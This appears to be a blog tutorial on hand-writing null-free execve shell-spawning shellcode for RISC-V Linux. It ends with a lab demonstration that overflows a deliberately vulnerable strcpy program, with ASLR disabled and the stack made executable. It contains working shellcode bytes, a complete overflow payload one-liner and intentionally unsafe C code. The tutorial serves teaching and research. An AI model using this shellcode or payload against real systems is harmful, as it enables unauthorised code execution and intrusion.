Basic Shellcode in RISC-V Linux

In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.

Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.

For getting started with shellcoding here is the key background information:

In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32 bit ones. Instruction alignment is relaxed to 16-bit boundaries.
qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16 and 32 bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
There are 32 integer registers, 64 bits in width, named x0 through x31. The program counter pc is separate and cannot be directly referenced. They are given alternative names like ra (return address), sp (stack pointer) and so on, to encourage consistent usage.
x0 (also called zero) always contains 0.
System calls are invoked using the ecall instruction, which has no parameters. The syscall number is taken from register a7 and the arguments from a0, a1, a2, etc.
Each individual instruction is stored little-endian in memory. objdump displays them big-endian, which is how they are documented in the ISA manual, so be careful.
There are no stack-manipulating instructions like x86’s call, push and pop. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative to sp (or s0, the frame pointer).

If in doubt refer to the User-Level ISA on the RISC-V website. It’s suprisingly readable and explains some of the design motivations too.

It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in cpuinfo below (“c” for compressed).

root@riscv64:~# uname -a
Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux
root@riscv64:~# cat /proc/cpuinfo
hart	: 0
isa	: rv64imafdcsu
mmu	: sv48

root@riscv64:~# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper
Target: riscv64-linux-gnu
...

Let’s go ahead and assemble some basic shellcode. It should launch /bin/sh using the execve() syscall. According to /usr/include/asm-generic/unistd.h that’s syscall number 221. I’m going to be sloppy and set both the argv and envp arguments (a1 and a2) to null. I just need a pointer to the path in a0. I create execve.s:

    .global _start
    .text
_start:
    li s1, 0x68732f2f6e69622f   # Load "/bin//sh" backwards into s1
    sd s1, -16(sp)              # Store dword s1 on the stack
    sd zero, -8(sp)             # Store dword zero after to terminate
    addi a0,sp,-16              # a0 = filename = sp + (-16)
    slt a1,zero,-1              # a1 = argv set to 0
    slt a2,zero,-1              # a2 = envp set to 0
    li a7, 221                  # execve = 221
    ecall                       # Do syscall

I’ve already done a couple of basic things to avoid nulls in the output. slt (set if less than) is a tidy way to load zero into a register. (Edit Nov 2018: This isn’t the best choice when compressed instructions are available. You can simply write li a1,0, which saves two bytes. It assembles to 16-bit C.LI, which can load any 6 bit (signed) immediate into any register and have no nulls in the machine code.) I also place my data just below sp instead of just above because small positive offsets tend to have lots of zeroes in them.

Assemble it into an executable:

$ gcc execve.s -c
$ ld execve.o -o execve

As hoped, this runs sh:

tk@riscv64:~$ ./execve
$

Double-checking with strace:

$ strace ./execve
execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0
execve("/bin//sh", NULL, NULL)          = 0
...

Now let’s have a look at how this is actually assembled.

$ objdump -d execve
...
0000000000010078 <_start>:
10078:	0343a4b7          	lui	s1,0x343a
1007c:	9794849b          	addiw	s1,s1,-1671
10080:	00c49493          	slli	s1,s1,0xc
10084:	7b748493          	addi	s1,s1,1975
10088:	00c49493          	slli	s1,s1,0xc
1008c:	34b48493          	addi	s1,s1,843
10090:	00d49493          	slli	s1,s1,0xd
10094:	22f48493          	addi	s1,s1,559
10098:	fe913823          	sd	s1,-16(sp)
1009c:	fe013c23          	sd	zero,-8(sp)
100a0:	ff010513          	addi	a0,sp,-16
100a4:	fff02593          	slti	a1,zero,-1
100a8:	fff02613          	slti	a2,zero,-1
100ac:	0dd00893          	li	a7,221
100b0:	00000073          	ecall

That’s way more instructions than we ever typed. The reason is li is one of several pseudo-instructions. Since it’s impossible to load an immediate 64-bit value with a 32-bit instruction it automatically splits it into a series of addi and slli (shift logical left) instructions.

We have quite a few null bytes in that auto-generated instruction sequence. In fact, slli instructions by definition start with seven 0 bits followed by 5 bits of shift-amount. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (C.SLLI in the ISA manual) which isn’t full of zeroes.

Let’s replace the li s1, 0x68732f2f6e69622f in our source code with the auto-generated instructions in objdump. New execve.s:

    .global _start
    .text
_start:
    lui	s1,0x343a
    addiw s1,s1,-1671
    slli s1,s1,0xc
    addi s1,s1,1975
    slli s1,s1,0xc
    addi s1,s1,843
    slli s1,s1,0xd
    addi s1,s1,559
    sd s1, -16(sp)              # Store it on the stack
    sd zero, -8(sp)             # Store a zero after to terminate
    addi a0,sp,-16              # a0 = sp + (-16)
    slt a1,zero,-1              # a1 set to 0 because 0 > -1
    slt a2,zero,-1              # Ditto for a2
    li a7, 221                  # execve = 221
    ecall                       # Do syscall

This is the disassembly after reassembling:

$ gcc execve.s -c; ld execve.o -o execve
$ objdump -d execve
...
0000000000010078 <_start>:
10078:	0343a4b7          	lui	s1,0x343a
1007c:	9794849b          	addiw	s1,s1,-1671
10080:	04b2                	slli	s1,s1,0xc
10082:	7b748493          	addi	s1,s1,1975
10086:	04b2                	slli	s1,s1,0xc
10088:	34b48493          	addi	s1,s1,843
1008c:	04b6                	slli	s1,s1,0xd
1008e:	22f48493          	addi	s1,s1,559
10092:	fe913823          	sd	s1,-16(sp)
10096:	fe013c23          	sd	zero,-8(sp)
1009a:	ff010513          	addi	a0,sp,-16
1009e:	fff02593          	slti	a1,zero,-1
100a2:	fff02613          	slti	a2,zero,-1
100a6:	0dd00893          	li	a7,221
100aa:	00000073          	ecall

Now those nulls are gone. What happened? It seems that the li pseudo-instruction will produce 32-bit slli instructions even if the C extension is available. I guess this is a missing optimisation. If we include the slli instructions directly in the source then it correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.

I want to point out the second-last instruction li a7,221. It’s interesting that objdump has displayed this as the pseudo-instruction. In reality this is addi a7,zero,221. Adding a value to the zero register is merely a convenient way to load a small immediate value to a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like x31 (whose index is all 1s) and then do addi a7,x31,221.

Finally we come to ecall. This mnemonic only exists as a 32-bit instruction and must appear exactly as 0x00000073. This was was easier to deal with in MIPS—the syscall opcode has a numeric parameter so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds—find a vulnerability where nulls are not a badchar, jump to an ecall at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.

For this example let’s assume we have an executable stack. We can generate an ecall at -4(sp) and jump to it. Replace the ecall with the following:

    # the 8 bytes below sp are already 0
    addi a3,zero,0x73       # Assign 0x73 to a3
    sb a3, -4(sp)           # Store single byte at sp-4
    addi a3,sp,-2           # a3 = sp - 2
    jr -2(a3)               # jump to a3 - 2

To avoid nulls, the jr needs to have a small negative offset and I also need to use a higher register than sp. Here I’ve chosen to use a3. I need to get the stack pointer value into a3, but again I need to use a small negative offset in the addi to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.

This time it must be compiled with an executable stack. Otherwise the program will segfault on the jump.

$ gcc execve.s -c; ld execve.o -o execve -z execstack

The final disassembly with no nulls:

00000000000100b0 <_start>:
100b0:	0343a4b7          	lui	s1,0x343a
100b4:	9794849b          	addiw	s1,s1,-1671
100b8:	04b2                	slli	s1,s1,0xc
100ba:	7b748493          	addi	s1,s1,1975
100be:	04b2                	slli	s1,s1,0xc
100c0:	34b48493          	addi	s1,s1,843
100c4:	04b6                	slli	s1,s1,0xd
100c6:	22f48493          	addi	s1,s1,559
100ca:	fe913823          	sd	s1,-16(sp)
100ce:	fe013c23          	sd	zero,-8(sp)
100d2:	ff010513          	addi	a0,sp,-16
100d6:	fff02593          	slti	a1,zero,-1
100da:	fff02613          	slti	a2,zero,-1
100de:	0dd00893          	li	a7,221
100e2:	07300693          	li	a3,115
100e6:	fed10e23          	sb	a3,-4(sp)
100ea:	ffe10693          	addi	a3,sp,-2
100ee:	ffe68067          	jr	-2(a3)

Let’s see the bytes in the order we actually need to provide them in our buffer.

$ objcopy -O binary --only-section=.text execve execve.text
$ od -t x1 execve.text
0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
0000100 e6 ff
0000102

Notice that all of the instructions are in reverse order. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable:

# echo 0 > /proc/sys/kernel/randomize_va_space

Now create a program vuln.c:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]);

void do_vuln(char *text) {
    char buffer[128];
    strcpy(buffer, text);
    printf("Location of buffer: %p\n", buffer);
    printf("Location of main: %p\n", main);
    printf("Input len: %d\n", strlen(buffer));
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Please include an argument\n");
    } else {
        do_vuln(argv[1]);
    }
    return 0;
}

We will need to compile this with an executable stack also.

$ gcc vuln.c -z execstack -o vuln
$ ./vuln hello
Location of buffer: 0x3ffffff4c0
Location of main: 0x2aaaaaa76a
Input len: 5

I won’t go into detail here but if you look at objdump -d vuln you can work out that inside do_vuln() the return address is stored at 152(sp) and the buffer is at 16(sp).

[shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite]
^ buffer

In practice the location of buffer depends on the size of the arguments on the stack so it takes a bit of trial and error but it does work:

tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'`
Location of buffer: 0x3ffffff440
Location of main: 0x2aaaaaa76a
Input len: 141
$

Final execve.s:

    .global _start
    .text
_start:
    lui	s1,0x343a               # Load "/bin//sh" into s1
    addiw s1,s1,-1671
    slli s1,s1,0xc
    addi s1,s1,1975
    slli s1,s1,0xc
    addi s1,s1,843
    slli s1,s1,0xd
    addi s1,s1,559
    sd s1, -16(sp)              # Store it on the stack
    sd zero, -8(sp)             # Store a zero after to terminate
    addi a0,sp,-16              # a0 = sp + (-16)
    slt a1,zero,-1              # a1 set to 0 because 0 > -1
    slt a2,zero,-1              # Ditto for a2
    li a7, 221                  # execve = 221
    addi a3,zero,0x73           # Create ecall instruction at -4(sp)
    sb a3, -4(sp)
    addi a3,sp,-2               # Dodge nulls in instructions
    jr -2(a3)                   # Jump to -4(sp)